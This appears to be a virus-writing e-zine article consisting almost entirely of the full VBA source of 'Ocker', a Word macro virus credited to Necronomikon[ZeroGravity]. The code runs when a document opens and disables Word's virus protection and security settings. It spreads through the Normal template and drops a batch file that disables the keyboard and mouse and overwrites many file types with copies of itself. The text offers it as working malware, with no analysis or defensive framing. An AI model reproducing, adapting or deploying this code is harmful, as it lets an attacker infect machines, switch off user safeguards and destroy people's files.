Infiltration of a Nation
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Strange Article - Ocker by Necronomikon
file ocker.cls:
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Sub Document_Open()
On Error Resume Next
Options.VirusProtection = 0
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
System.PrivateProfileString("HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", " Level ") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Nec = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
KKS = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Application.EnableCancelKey = 0
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set PSHQ = ActiveDocument.VBProject.VBComponents.Item(1)
Code = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set PSHQ = NormalTemplate.VBProject.VBComponents.Item(1)
THC = True
End If
If THC = True Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\" & Application.UserInitials
PSHQ.CodeModule.PSHQdFromFile ("c:\" & Application.UserInitials)
PSHQ.CodeModule.deletelines 1, 4
PSHQ.CodeModule.replaceline 1, "Sub Document_Close()"
ElseIf Code = True Then
PSHQ.CodeModule.PSHQdFromFile ("c:\" & Application.UserInitials)
PSHQ.CodeModule.deletelines 1, 4
End If
Open "c:\""windows\system\ocker.bat" For Output As #1
Print #1, "@Echo off"
Print #1, "ECHO *******************"
Print #1, "ECHO *ocker.Batch Virus*"
Print #1, "ECHO *******************"
Print #1, "ECHO Coded by Necronomikon[ZeroGravity]"
Print #1, "ctty nul"
Print #1, "rundll32.exe Keyboard, Disable"
Print #1, "rundll32.exe mouse, Disable"
Print #1, "Copy ocker.bat C:\Windows\System\ocker.bat"
Print #1, "IF NOT EXIST C:\Windows\System\ocker.bat GOTO END"
Print #1, "C:"
Print #1, "cd %windir%"
Print #1, "cd System"
Print #1, ": Start"
Print #1, "for %%f in (*.htm *.pas *.bas *.nfo *.sys *.com *.c *.zip *.ini *.gif *.exe *.obj *.wav *.dat *.dll *.txt *.doc *.bmp *.jpg *.cls *.frm ) do set A=%%f"
Print #1, "if %A%==Command.com set A="
Print #1, "if %A%==System.ini set A="
Print #1, "if %A%==MsDos.sys set A="
Print #1, "Copy ocker.bat %A%"
Print #1, "ren %A% *.NEC"
Print #1, "set A="
Print #1, "GoTo Start"
Print #1, ": End"
Print #1, "ctty con"
Close #1
Application.Caption = "You are infected with 'ocker'"
Application.StatusBar = True
StatusBar = "(c)30-07-2001 Necronomikon[ZeroGravity]"
'Ocker
'(c)30-07-2001 Necronomikon[ZeroGravity]
End Sub